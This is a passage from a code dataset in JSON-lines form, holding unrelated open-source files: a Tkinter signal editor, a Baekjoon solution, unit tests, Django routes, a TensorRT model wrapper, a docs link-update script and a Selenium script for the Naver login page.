command=self.do_verify)\n verify_button.pack(side=tkinter.LEFT, padx=4, pady=4)\n else:\n send_button = tkinter.Button(button_frame, text=\"Send\",\n bg=BUTTON_COLOR,\n command=self.do_send)\n send_button.pack(side=tkinter.LEFT, padx=4, pady=4)\n close_button = tkinter.Button(button_frame, text=\"Close\",\n bg=BUTTON_COLOR,\n command=self.do_close)\n close_button.pack(side=tkinter.LEFT, padx=4, pady=4)\n\n def do_close(self):\n self.app.close_signal_window(self.parent)\n \n def do_send(self):\n self.app.do_send(self.sig, self.tree)\n\n def do_verify(self):\n self.app.do_verify(self.sig, self.tree)\n\n\n# ----------------------------------------------------------------\nclass StatusBarFrame(tkinter.Frame):\n\n def __init__(self, parent):\n tkinter.Frame.__init__(self, parent, bg=BG_COLOR)\n self.label = tkinter.Label(self, bd=1, relief=tkinter.SUNKEN,\n anchor=tkinter.W)\n self.label.pack(fill=tkinter.X)\n\n def error(self, txt):\n self.label['bg'] = \"red\"\n self.label.config(text=txt)\n self.label.update_idletasks()\n\n def info(self, txt=None):\n self.label['bg'] = \"lightgreen\"\n if txt is None:\n txt = \"\"\n self.label.config(text=txt)\n self.label.update_idletasks()\n\n\n# ----------------------------------------------------------------\nclass App:\n \"\"\"Application.\n\n \"\"\"\n unique_sig = 0\n\n def __init__(self, root):\n self.root = root\n self.gw = None\n self.pid = 0\n self.sig_list = []\n self.receive_list = []\n\n # Top level structure frames\n top_frame = tkinter.Frame(root, bg=BG_COLOR)\n top_frame.pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)\n top_frame.grid_rowconfigure(0, weight=1)\n top_frame.grid_rowconfigure(1, weight=1)\n top_frame.grid_rowconfigure(2, weight=0)\n top_frame.grid_columnconfigure(0, weight=1)\n top_frame.grid_columnconfigure(1, weight=1)\n\n # Application frames\n self.sig_frame = SignalListFrame(self, top_frame)\n self.log_frame = LogFrame(self, top_frame)\n self.rec_frame = ReceiveFrame(self, top_frame)\n self.con_frame = ConnectionFrame(self, top_frame)\n self.status = StatusBarFrame(top_frame)\n\n # Layout\n self.sig_frame.grid(row=0, column=0, sticky=STICKY_ALL)\n self.log_frame.grid(row=1, column=0, sticky=STICKY_ALL)\n self.rec_frame.grid(row=0, column=1, sticky=STICKY_ALL)\n self.con_frame.grid(row=1, column=1, sticky=tkinter.S + tkinter.W + tkinter.E)\n self.status.grid(row=2, column=0, columnspan=2,\n sticky=tkinter.S + tkinter.W + tkinter.E)\n\n # Other inits\n #self.status.info(\"Disconnected\")\n self.log_frame.log_string(\"import ogre\")\n\n\n def load_signal_file(self, path):\n \"\"\"Load signals from a python signal definition file.\n\n Instantaite each signal and insert the signal in the sig_list\n list. \n \"\"\"\n self.status.info()\n try:\n file_name = os.path.basename(path)\n module_name, ext = os.path.splitext(file_name)\n with open(path) as sig_file:\n module = imp.load_source(module_name, path, sig_file)\n except Exception:\n self.status.error(\"Error reading '%s' signal file\" % file_name)\n return\n\n for attr, obj in module.__dict__.items():\n if isinstance(obj, type) and issubclass(obj, ogre.Signal):\n sig = obj()\n self.sig_list.append((attr, sig))\n self.sig_frame.add(\"%s.%s\" % (module_name, attr))\n\n self.log_frame.log_import(module_name)\n\n def close_signal_window(self, closed_window):\n \"\"\"SignalFrame window closing.\n\n Called when a SignalFRame window is about to be close. Destory\n the window and remove the windows reference in the recive_list\n (if any).\n \"\"\"\n for i, asig in enumerate(self.receive_list):\n (sig, var, window) = asig\n if window is closed_window:\n self.receive_list[i] = (sig, var, None)\n closed_window.destroy()\n\n \n # Command handlers\n\n def do_open(self):\n self.status.info()\n file_name = askopenfilename(filetypes=[(\"signal descriptor\", \".py\")],\n title=\"Open Signal File\",\n parent= self.root)\n if file_name:\n module = self.load_signal_file(file_name)\n\n def do_open_send_signal(self, index):\n self.status.info()\n name, sig = self.sig_list[index]\n\n self.unique_sig += 1\n var = \"sig%d\" % self.unique_sig\n\n window = tkinter.Toplevel()\n window.title(var)\n sig_frame = SignalFrame(self, window, copy.deepcopy(sig), var)\n sig_frame.pack(fill=tkinter.BOTH, expand=1)\n\n def do_open_rec_signal(self, index):\n self.status.info()\n sig, var, window = self.receive_list[index]\n\n if window:\n window.lift()\n else:\n window = tkinter.Toplevel()\n window.title(var)\n sig_frame = SignalFrame(self, window, sig, var, rx=True)\n sig_frame.pack(fill=tkinter.BOTH, expand=1)\n self.receive_list[index] = (sig, var, window)\n\n def do_connect(self, url, proc):\n if self.gw:\n self.status.error(\"Already connected\")\n return\n\n try:\n self.gw = ogre.create(url, \"siged\")\n self.gw.hunt(proc)\n sig = self.gw.receive(timeout=1.0)\n if sig is None:\n self.gw.close()\n self.gw = None\n self.status.error(\"Can't find %s\" % proc)\n return\n self.pid = sig.sender()\n self.log_frame.log_connect(url, proc)\n self.status.info(\"Connected to %s\" % proc)\n except Exception as e:\n self.status.error(\"Connect error: %s\" % e)\n\n\n def do_disconnect(self):\n try:\n if self.gw:\n self.gw.close()\n self.log_frame.log_disconnect()\n self.status.info(\"Disconnected\")\n except Exception as e:\n self.status.error(\"Disconnect error %s\" % e)\n self.gw = None\n\n\n def do_send(self, old_sig, tree):\n if not self.gw:\n self.status.error(\"Not connected\")\n return\n\n try:\n self.log_frame.log_send(old_sig, tree)\n sig = tree.value()\n self.gw.send(sig, self.pid)\n self.status.info(\"Sent %s\" % sig.__class__.__name__)\n except Exception as e:\n self.status.error(\"Send error %s\" % e)\n\n\n def do_verify(self, sig, tree):\n self.status.info()\n self.log_frame.log_verify(sig, tree)\n\n\n def do_receive(self):\n if not self.gw:\n self.status.error(\"Not connected\")\n return\n\n self.status.info(\"\")\n try:\n while True:\n sig = self.gw.receive(timeout=0.1)\n if sig is None:\n return\n\n self.unique_sig += 1\n var = \"sig%d\" % self.unique_sig\n\n self.receive_list.append((sig, var, None))\n self.rec_frame.add(sig, var)\n self.log_frame.log_receive(var)\n except Exception as e:\n self.status.error(\"Receive error %s\" % e)\n\n\n def do_save_script(self):\n self.status.info()\n file_name = asksaveasfilename(filetypes=[(\"python script\", \".py\")],\n title=\"Save Script\",\n parent= self.root)\n if file_name:\n with open(file_name, \"w\") as log_file:\n log_file.write(self.log_frame.get_log())\n \n\n# ----------------------------------------------------------------\ndef main(args):\n \"\"\"Main entry point.\n\n Create the main window and start the main loop.\n\n Parameters:\n args -- list of signal description files to \n \"\"\"\n root = tkinter.Tk()\n root.title(\"OGRE Editor\")\n app = App(root)\n for path in args:\n app.load_signal_file(path)\n root.mainloop()\n\n\n# ---------------------------------------------------------------- \nif __name__ == '__main__':\n main(sys.argv[1:])\n\n\n# End of file\n","repo_name":"CheukLeung/FlogReporter","sub_path":"work/jobs/Ruby_test/workspace/pyogre3/examples/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":23231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32659729569","text":"import sys\n\n# 사원들의 출퇴근 상태를 기록한 리스트\nvisit_state = []\n# 사원들의 출퇴근 여부에따라 True, False로 판별\nvisit_dict = {}\n\n# 방문 출입 횟수 n\nn = int(sys.stdin.readline())\n\n# 방문 출입을 총 n번 실행한다\nfor i in range(n) :\n # 이름과 방문 상태여부 확인\n name, state = sys.stdin.readline().split()\n # 사원 이름과 출퇴근 여부를 입력\n visit_state.append((name,state))\n # 사원들의 실제 출퇴근 상태를 나타내는 dict\n if name not in visit_dict :\n visit_dict[name] = False \n\nfor i in range(len(visit_state)) :\n # enter이면 출근이고 leave라면 퇴근이다\n if visit_state[i][1] == 'enter' :\n visit_dict[visit_state[i][0]] = True\n else :\n visit_dict[visit_state[i][0]] = False\n\n\n# 회사에 남은 사람들의 이름을 사전 역순으로 정렬\nsort_state = sorted(visit_dict.items(), reverse=True)\n\n# 출력\nfor i in range(len(sort_state)) :\n if sort_state[i][1] :\n print(sort_state[i][0])\n","repo_name":"KimHyungkeun/Algorithm","sub_path":"Baekjoon/해시/7785_회사에있는사람.py","file_name":"7785_회사에있는사람.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71895486866","text":"from src.parameters import *\n\n\nclass Board(object):\n def __init__(self):\n self.slots = 30\n self.white_pieces_on = 15\n self.black_pieces_on = 15\n self.white_pieces_off = 0\n self.black_pieces_off = 0\n self.white_pieces_safe = 0\n self.black_pieces_safe = 0\n self.state = dict()\n self.state[1] = 2\n\n def move_piece(self, color, start_location, end_location):\n return 0\n\n @property\n def game_complete(self):\n if self.white_pieces_safe:\n print(\"white won\")\n return True\n elif self.black_pieces_safe:\n print(\"back wins\")\n return True\n else:\n return False\n\n def print(self):\n print(self.state)\n","repo_name":"bugo99iot/deep_gammon","sub_path":"src/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22027052710","text":"\"\"\"\nModule for testing ImgProcessor\n\nAuthors: Jorn Tuyls\n\"\"\"\n\nimport unittest\nimport numpy as np\n\nimport sys\nimport logging\n\nfrom cvx.img_processor import ImgProcessor\n\nlogger = logging.getLogger('cvx')\nlogger.addHandler(logging.StreamHandler(sys.stdout))\nlogger.setLevel(logging.DEBUG)\n\n\nclass TestImgProcessor(unittest.TestCase):\n\n def test_scale_transpose(self):\n logger.debug(\"Test scale and tranpose\")\n # NCHW\n imgs = np.transpose(\n np.reshape(np.array([\n [[10,10],\n [50,10]],\n [[30,50],\n [10,90]],\n [[20, 0],\n [0, 0]]\n ]), (1,3,2,2)),\n (0,2,3,1)\n ) # NCHW -> NHWC\n\n img_processor = ImgProcessor('scale-2.0__transpose-2,0,1')\n res = img_processor.execute(imgs)\n\n expected_outpt = np.transpose(2.0 * imgs, (0,3,1,2)) # NHWC -> NCHW\n \n np.testing.assert_array_equal(res, expected_outpt)\n\n def test_crop_transpose(self):\n logger.debug(\"Test crop and tranpose\")\n # NCHW\n imgs = np.transpose(\n np.reshape(np.array([\n [[10,10,0],\n [50,10,0],\n [0,0,0]],\n [[30,50,0],\n [10,90,0],\n [0,0,0]],\n [[20,0,0],\n [0,0,0],\n [0,0,0]]\n ]), (1,3,3,3)),\n (0,2,3,1)\n )\n\n img_processor = ImgProcessor('crop-0,2-0,2-1,3__transpose-2,0,1')\n res = img_processor.execute(imgs)\n\n expected_outpt = np.reshape(np.array([\n [[30,50],\n [10,90]],\n [[20, 0],\n [0, 0]]\n ]), (1,2,2,2)) # NCHW\n \n np.testing.assert_array_equal(res, expected_outpt)\n \n\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"seokNULL/pim-compiler","sub_path":"lib/cvx/tests/integration/test_img_processor.py","file_name":"test_img_processor.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17882050620","text":"from django.urls import path\nfrom .views import crawlStatusView,autoComplete,stateComparison\n#GenericReportDetailAPIView,GenericReportUpdateAPIView,GenericReportCreateAPIView,GenericReportListAPIView\nfrom . import views\nurlpatterns = [ \n path('crawlStatus/', crawlStatusView.as_view()),\n path('autoComplete/', autoComplete.as_view()),\n path('stateComparison/', stateComparison.as_view()),\n path('', views.index, name='index'),\n path('cool_chart/',\n views.my_cool_chart_view,\n name='my-cool-chart'\n ),\n ]\n\n","repo_name":"rajesh241/libtechDjango","sub_path":"src/nrega/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13934685302","text":"# -*- coding: utf-8 -*-\n\n\"\"\" This file is part of OctoPNP\n\n This is a test script to execute the imageprocessing-steps independent from the main software\n and particularly without a running printer.\n\n Main author: Florens Wasserfall <wasserfall@kalanka.de>\n\"\"\"\n\nimport time\nimport ImageProcessing\n\nim = ImageProcessing.ImageProcessing(15.0, 120, 120)\n\n\nstart_time = time.time()\n\nim.SetInteractive(True)\n# im.locatePartInBox(\"../utils/testimages/head_atmega_SO8.png\", False)\n# im.locatePartInBox(\"../utils/testimages/head_atmega_SO8_2.png\", False)\n# print im.getPartOrientation(\"../utils/testimages/bed_atmega_SO8_rotated.png\", 30)\nim.getPartOrientation(\"../utils/testimages/orientation_bed_atmega_SO8_green.png\", 55.65)\n# im.getPartPosition(\"../utils/testimages/orientation_bed_atmega_SO8_green.png\", 55.65)\n# im.getPartOrientation(\"../utils/testimages/bed_resistor_1206.png\", 55.65)\n\nend_time = time.time()\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n","repo_name":"platsch/OctoPNP","sub_path":"octoprint_OctoPNP/ImageProcessingCaller.py","file_name":"ImageProcessingCaller.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"48"} +{"seq_id":"5086817996","text":"def print_formatted(number):\n for num in range(1,number+1):\n \n print(num, octal(num), hexadecimal(num), binario(num))\n \n \ndef binario(num)->str:\n lista = [2**n for n in range(num) if 2**n <= num ]\n \n for i in reversed(lista):\n if i <= num:\n num = num-i\n lista[lista.index(i)] = 1\n else:\n lista[lista.index(i)] = 0\n \n binario = ''.join(reversed([str(num) for num in lista]))\n return binario\n\n \ndef octal(num)->str:\n lista = []\n while num > 0:\n division = num//8\n multiplicacion = division * 8\n resta = num - multiplicacion\n lista.insert(0,str(resta))\n num =+ division\n octal = ''.join(lista)\n return octal\n\n \ndef hexadecimal(num)->str:\n lista = []\n dic = {0:0, 1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8, 9:9,\n 10:\"A\", 11:\"B\", 12:\"C\", 13:\"D\", 14:\"E\", 15:\"F\"}\n while num > 0:\n division = num//16\n multiplicacion = division * 16\n resta = num - multiplicacion\n lista.insert(0,resta)\n num =+ division\n lista = [str(dic[n]) for n in lista]\n hexadecimal = ''.join(lista)\n return hexadecimal\n\nif __name__ == '__main__':\n n = int(input())\n print_formatted(n)\n","repo_name":"dperezc21/ejercicios","sub_path":"ejercicio/conversión de decimal.py","file_name":"conversión de decimal.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8082060368","text":"\"\"\"empty message\n\nRevision ID: c61fb27ebf1f\nRevises: d594838bcd76\nCreate Date: 2023-08-03 23:23:08.148550\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c61fb27ebf1f'\ndown_revision = 'd594838bcd76'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('cart', schema=None) as batch_op:\n batch_op.create_foreign_key('fkpid', 'prod', ['Pid'], ['id'])\n batch_op.drop_column('no')\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('cart', schema=None) as batch_op:\n batch_op.add_column(sa.Column('no', sa.INTEGER(), nullable=False))\n batch_op.drop_constraint('fkpid', type_='foreignkey')\n\n # ### end Alembic commands ###\n","repo_name":"paulose610/greenvent","sub_path":"greenvent/migrations/versions/c61fb27ebf1f_.py","file_name":"c61fb27ebf1f_.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1868418673","text":"from unittest import TestCase\nfrom unittest.mock import patch\nfrom h1st import Graph, Action, Model\nfrom h1st.schema.testing import setup_schema_tests\n\n\nclass SchemaTestingTestCase(TestCase):\n @patch('h1st.schema.testing.ValidationSchema')\n def test_test_case_generator(self, mock_graph_schema):\n\n mock_graph_schema.load.return_value = {}\n\n class MyTestModel(Model):\n pass\n\n g = Graph()\n g.start()\n g.add(Model())\n g.end()\n\n scopes = {}\n setup_schema_tests(g, scopes)\n self.assertEqual({}, scopes)\n\n mock_graph_schema.load.return_value = {\n 'Model': {\n 'test_input': {\n 'test': 1\n },\n 'expected_output': {\n 'schema': {\n 'type': dict,\n },\n }\n }\n }\n setup_schema_tests(g, scopes)\n self.assertTrue('Graph_Model_output' in scopes)\n\n @patch('h1st.schema.testing.ValidationSchema')\n def test_test_case_runner(self, mock_graph_schema):\n class MyTestModel(Model):\n def predict(self, input_data):\n return {\n \"result\": sum(input_data['inputs'])\n }\n\n g = Graph()\n g.start()\n g.add(Model())\n g.end()\n\n test_data = []\n schema = {\n 'Model': {\n 'test_input': {},\n 'expected_output': {\n 'schema': {\n 'type': dict,\n }\n }\n }\n }\n\n mock_graph_schema.load.return_value = schema\n g._schema = schema\n\n scopes = {}\n setup_schema_tests(g, scopes)\n test_class = scopes['Graph_Model_output']\n\n result = test_class('runTest')()\n self.assertEqual(0, len(result.errors))\n\n schema['Model']['test_input']['inputs'] = [1, 2, 3]\n result = test_class('runTest')()\n self.assertEqual(0, len(result.errors))\n\n schema['Model']['expected_output']['schema']['type'] = list\n result = test_class('runTest')()\n self.assertTrue(\"Expects list, receives dict\" in result.failures[0][1])\n","repo_name":"thangtranth/h1st","sub_path":"h1st/tests/core/test_schema_testcase.py","file_name":"test_schema_testcase.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"14272794091","text":"\nfrom sympy.core.relational import Unequal\n\nfrom axiom.utility import plausible\nfrom axiom.utility import check\nfrom sympy import Symbol, Slice\nfrom sympy.stats.symbolic_probability import Probability as P\nfrom axiom.statistics import bayes\n\nfrom sympy.stats.rv import pspace\nfrom sympy.core.numbers import oo\n\n\n# given: P(x, y) != 0\n# imply: P(x[:t], y[:t]) != 0\n@plausible\ndef apply(given, indices):\n assert given.is_Unequality\n assert given.lhs.is_Probability\n assert given.rhs.is_zero\n \n eqs = given.lhs.arg\n assert eqs.is_And\n \n args = []\n for eq, t in zip(eqs.args, indices): \n x, _x = eq.args\n assert _x == pspace(x).symbol\n args.append(x[t])\n \n return Unequal(P(*args), 0, given=given)\n\n\n@check\ndef prove(Eq):\n n = Symbol.n(integer=True, domain=[2, oo])\n x = Symbol.x(real=True, shape=(n,), random=True)\n y = Symbol.y(real=True, shape=(n,), random=True)\n t = Symbol.t(integer=True, domain=[1, n - 1])\n \n Eq << apply(Unequal(P(x, y), 0), Slice[:t, :t])\n \n Eq << Eq[0].this.lhs.arg.args[-1].bisect(Slice[:t])\n \n Eq << Eq[-1].this.lhs.arg.args[0].bisect(Slice[:t])\n \n Eq << bayes.inequality.et.apply(Eq[-1], wrt={x[:t], y[:t]}).split()\n \n \nif __name__ == '__main__':\n prove(__file__)\n","repo_name":"cosmosZhou/sagemath","sub_path":"axiom/statistics/bayes/inequality/inequality/joint_slice.py","file_name":"joint_slice.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33264568066","text":"# IPython log file\n\nimport subprocess as s\nimport json\n\n\nmydict = dict(\n one='foo',\n two='bar',\n three='baz')\n\n\nd = json.dumps(mydict)\nd = d.encode('utf-8')\n\n\nout = s.check_output(\"jq '.'\", input=d, shell=True)\n\n\nout = out.decode('utf-8')\nout = out.replace('\\n','')\n\n\n","repo_name":"npmcdn-to-unpkg-bot/stat-track","sub_path":"rethink-prototype/jq/subp.py","file_name":"subp.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34035898597","text":"#!/bin/python3\n# https://github.com/pingcap/docs/pull/13016\nimport re\nimport sys\nimport logging\nfrom pathlib import Path\nfrom glob import iglob\n\nimport requests\n\nlogging.basicConfig(level=logging.INFO)\nurls: dict[str, bool] = {}\n\n\ndef validate_url(url: str) -> bool:\n url = re.sub(\n \"https://dev.mysql.com/doc/refman/5\\.[67]/\",\n \"https://dev.mysql.com/doc/refman/8.0/\",\n url,\n )\n\n if url in urls:\n return urls[url]\n\n r = requests.get(url)\n if r.status_code == 200:\n urls[url] = True\n else:\n logging.warning(\"Got HTTP status code %s for %s\", r.status_code, url)\n urls[url] = False\n return urls[url]\n\n\ndef update_file(filename: str) -> None:\n with open(filename, \"r+\") as fh:\n content = fh.read()\n # Look for reference manual urls and stop at:\n # - the end of the url target `)`\n # - the end of the url text `]`\n # - at an anchor `#`\n for m in re.findall(\n \"https://dev.mysql.com/doc/refman/5\\.[67]/[^#\\])]*\", content\n ):\n validate_url(m)\n newcontent = re.sub(\n \"https://dev.mysql.com/doc/refman/5\\.[67]/\",\n \"https://dev.mysql.com/doc/refman/8.0/\",\n content,\n )\n newcontent = re.sub(\n \"(https://dev.mysql.com/doc/refman)/8\\.0/(.*available in MySQL 5.7)\",\n r\"\\1/5.7/\\2\",\n newcontent,\n )\n for m in re.findall(\n \"https://dev.mysql.com/doc/refman/8\\.0/[^#\\])]*\", content\n ):\n validate_url(m)\n fh.seek(0)\n fh.truncate()\n fh.write(newcontent)\n\n\nif Path().cwd().name != \"docs\":\n print(\"Please run this from the root of the docs repo.\")\n sys.exit(1)\n\nfor f in iglob(\"**/*.md\", recursive=True):\n # Skip updating release notes\n if f.startswith(\"releases/\"):\n continue\n update_file(f)\n","repo_name":"pingcap/docs","sub_path":"scripts/update_mysql_ref.py","file_name":"update_mysql_ref.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":529,"dataset":"github-code","pt":"48"} +{"seq_id":"24076639116","text":"#!/usr/bin/env python\r\n# -*- coding: UTF-8 -*-\r\nclass Script:\r\n\r\n @staticmethod\r\n def get_attr(script_name):\r\n splitStr = script_name.split(\".\", -2)\r\n length = len(splitStr)\r\n for index in range(len(splitStr)):\r\n if index == length - 1:\r\n method_name = splitStr[index]\r\n elif index == length - 2:\r\n class_name = splitStr[index]\r\n elif index == 0:\r\n module_name = splitStr[index]\r\n else:\r\n module_name = module_name + '.' + splitStr[index]\r\n\r\n module = __import__(module_name,{},{},[class_name]) # import module\r\n clz = getattr(module, class_name)\r\n obj = clz() # new class\r\n mtd = getattr(obj, method_name)\r\n return mtd\r\n\r\n","repo_name":"ericcoderr/TestAutomation","sub_path":"app/WMAT/src/helper/script_helper.py","file_name":"script_helper.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18794942392","text":"import uff\nimport os\nimport tensorflow as tf\nimport pycuda.driver as cuda\nimport keras.backend as K\nfrom keras.preprocessing import image\nfrom keras.applications.resnet50 import preprocess_input\nfrom keras.applications import resnet50\nimport numpy as np\nimport tensorrt as trt\nfrom tensorrt.parsers import uffparser\n\n\n# your model should already have been trained, and you'd be using it for inference only\n# set learning phase to Testing (0) so that all untrainable nodes are excluded from the UFF model\nK.set_learning_phase(0)\n\n# very important -- gotta set the right CUDA architecture otherwise you can't build the engine\n# V100 -> 70, don't bother using this in K80s or 1080\nos.environ[\"CUDA_ARCH\"] = \"70\"\n# how much memory to allocate for the engine -- 1GB -- can go a bit higher on V100\nMAX_WORKSPACE_SIZE = 1 << 30\n# maximum batch size allowed -- 128 was the best\nMAX_BATCH_SIZE = 128\n# what datatype to represent the matrices on the GPU\nTRT_DATATYPE = trt.infer.DataType.FLOAT\ntrt_logger = trt.infer.ConsoleLogger(trt.infer.LogSeverity.INFO)\n\n\nclass TensorrtWrapper:\n\n def __init__(self, uff_path, model_input_name, model_output_name, batch_size=MAX_BATCH_SIZE):\n self.batch_size = batch_size\n self.stream = cuda.Stream()\n self.model_input_name = model_input_name\n self.model_output_name = model_output_name\n\n print(\"Creating tensorrt context....\")\n self.context = self.parse_uff_model(uff_path=uff_path)\n self.output = self.d_input = self.d_output = self.bindings = None\n print(\"Allocating memory arrays....\")\n self.allocate_memory_arrays()\n\n def parse_uff_model(self, uff_model=None, uff_path=None):\n assert uff_model or uff_path, \"Must pass in either a UFF model or the path to an UFF model in disk\"\n if uff_path:\n with open(uff_path, 'rb') as uff_file:\n uff_model = uff_file.read()\n parser = uffparser.create_uff_parser()\n # input_1\n parser.register_input(self.model_input_name, (3, 224, 224), 0)\n # dense_2/Sigmoid\n parser.register_output(self.model_output_name)\n engine = trt.utils.uff_to_trt_engine(logger=trt_logger,\n stream=uff_model,\n parser=parser,\n max_batch_size=MAX_BATCH_SIZE,\n max_workspace_size=MAX_WORKSPACE_SIZE,\n datatype=TRT_DATATYPE)\n context = engine.create_execution_context()\n return context\n\n def allocate_memory_arrays(self):\n # load engine\n engine = self.context.get_engine()\n assert (engine.get_nb_bindings() == 2), \"Wrong engine configuration for our task, please check tensorrt\" \\\n \" documentation before using this\"\n # create output array to receive data\n dims = engine.get_binding_dimensions(1).to_DimsCHW()\n elt_count = dims.C() * dims.H() * dims.W() * self.batch_size\n # create a sample batch image to define how much memory we need to allocate\n input_img = np.random.rand(self.batch_size, 224, 224, 3).astype(np.float32)\n # Allocate pagelocked memory\n self.output = cuda.pagelocked_empty(elt_count, dtype=np.float32)\n print(\"Image size: {}\".format(input_img.size))\n # alocate device memory\n self.d_input = cuda.mem_alloc(self.batch_size * input_img.size * input_img.dtype.itemsize)\n self.d_output = cuda.mem_alloc(self.batch_size * self.output.size * self.output.dtype.itemsize)\n self.bindings = [int(self.d_input), int(self.d_output)]\n\n def run_prediction(self, input_img):\n \"\"\"\n Use this to run the actual inference on the device\n :return:\n \"\"\"\n # transfer input data to device\n cuda.memcpy_htod_async(self.d_input, input_img, self.stream)\n # execute model\n self.context.enqueue(self.batch_size, self.bindings, self.stream.handle, None)\n # transfer predictions back\n cuda.memcpy_dtoh_async(self.output, self.d_output, self.stream)\n\n\n###################################\n### UTILS #########################\n###################################\n\n\ndef convert_keras_to_uff_model(model, uff_model_path):\n # have to make BatchNorm layers untrainable since they're not yet supported by tensorrt\n for entry in model.layers:\n if 'bn' in entry:\n entry.trainable = False\n\n model_input_name = model.input.name.strip(':0')\n model_output_name = model.output.name.strip(':0')\n input_size = model.input.shape\n print(input_size)\n graph = tf.get_default_graph().as_graph_def()\n init = tf.global_variables_initializer()\n sess = K.get_session()\n sess.run(init)\n\n frozen_graph = tf.graph_util.convert_variables_to_constants(sess, graph, [model_output_name])\n frozen_graph = tf.graph_util.remove_training_nodes(frozen_graph)\n uff_model = uff.from_tensorflow(frozen_graph, [model_output_name])\n with open(uff_model_path, 'wb') as dump:\n dump.write(uff_model)\n\n return model_input_name, model_output_name\n\n\ndef process_img_example():\n test_image = image.load_img('example_image.jpg', target_size=(224, 224, 3))\n test_image = image.img_to_array(test_image)\n processed_im = preprocess_input(np.expand_dims(test_image, 0))[0, :, :, :]\n processed_im = np.transpose(processed_im, axes=(2, 0, 1))\n # gotta make the image matrix contiguous\n processed_im = processed_im.copy(order='C')\n return processed_im\n\n\nif __name__ == '__main__':\n # small example\n\n # load in the original Keras model from disk -- example with imagenet weights\n model = resnet50.ResNet50(include_top=True, weights='imagenet')\n model.load_weights('resnet50_example.h5')\n model.compile(optimizer='rmsprop', loss='categorical_crossentropy')\n\n # convert it to an UFF model\n model_input_name, model_output_name = convert_keras_to_uff_model(model, 'uff_resnet_50.uff')\n\n # now use the UFF model with Nvidia's Tensorrt library to speed up predictions\n tw = TensorrtWrapper('uff_resnet_50.uff',\n model_input_name=model_input_name,\n model_output_name=model_output_name)\n\n # generate fake images\n images = []\n for _ in range(128):\n test_image = np.random.rand(224, 224, 3)\n images.append(test_image)\n images = np.array(images)\n images = np.transpose(images, axes=(0, 3, 1, 2)).astype(np.float32)\n images = images.copy(order='C')\n tw.run_prediction(images)\n print(tw.output)\n","repo_name":"guilherme-pombo/Resnet_Tensorrt","sub_path":"tensorrt_wrapper.py","file_name":"tensorrt_wrapper.py","file_ext":"py","file_size_in_byte":6665,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"19663374006","text":"from selenium import webdriver\nimport time\nchrome_path = 'C:\\오유라\\chromedriver.exe'\nurl = 'http://www.naver.com'\n\nbrowser = webdriver.Chrome(chrome_path)\nbrowser.get(url)\ntime.sleep(3)\nbrowser.find_element_by_xpath('//*[@id=\"u_skip\"]/a[5]').click()\n\n#개발자 탭에서 태그에서 xpath 버튼 클릭해서 코드 실행\ntime.sleep(2)\nbrowser.find_element_by_css_selector('#id').send_keys(id)\ntime.sleep(2)\nbrowser.find_element_by_xpath('//*[@id=\"log-in-button\"]').click()\n\n#Keys.ENTER = 엔터\n#Keys.RETURN = 엔터\n#Keys.SPACE = 스페이스\n#Keys.ARROW_UP = 방향키 위\n#Keys.ARROW_DOWN = 방향키 아래\n#Keys.ARROW_LEFT = 방향키 왼쪽\n#Keys.ARROW_RIGHT = 방향키 오른쪽 \n#Keys.BACK_SPACE = 지우기\n#Keys.DELETE = 지우기(딜리트)\n#Keys.CONTROL = Ctrl\n#Keys.ALT = ALT\n#Keys.SHIFT = SHIFT\n#Keys.TAB = TAB\n#Keys.PAGE_UP = 스크롤 업\n#Keys.PAGE_DOWN = 스크롤 다운 \n#Keys.F1~9 = F1부터 F9까지 \n\n#find_element_by_id = 'id 속성을 사용하여 접근'\n#find_element_by_name = 'name 속성을 사용하여 접근'\n#find_element_by_xpath = 'xpath 속성을 사용하여 접근'\n#find_element_by_link_text ='앵커태그(a태그)에 사용되는 텍스트로 접근'\n#find_element_by_partial_link_text = '앵커태그에 사용되는 일부 텍스트로 접근'\n#find_element_by_tag_name = '태그를 사용해서 접근'\n#find_element_by_class_name = '클래스를 사용해서 접근'\n#find_element_by_css_selector = ' css선택자를 사용하여 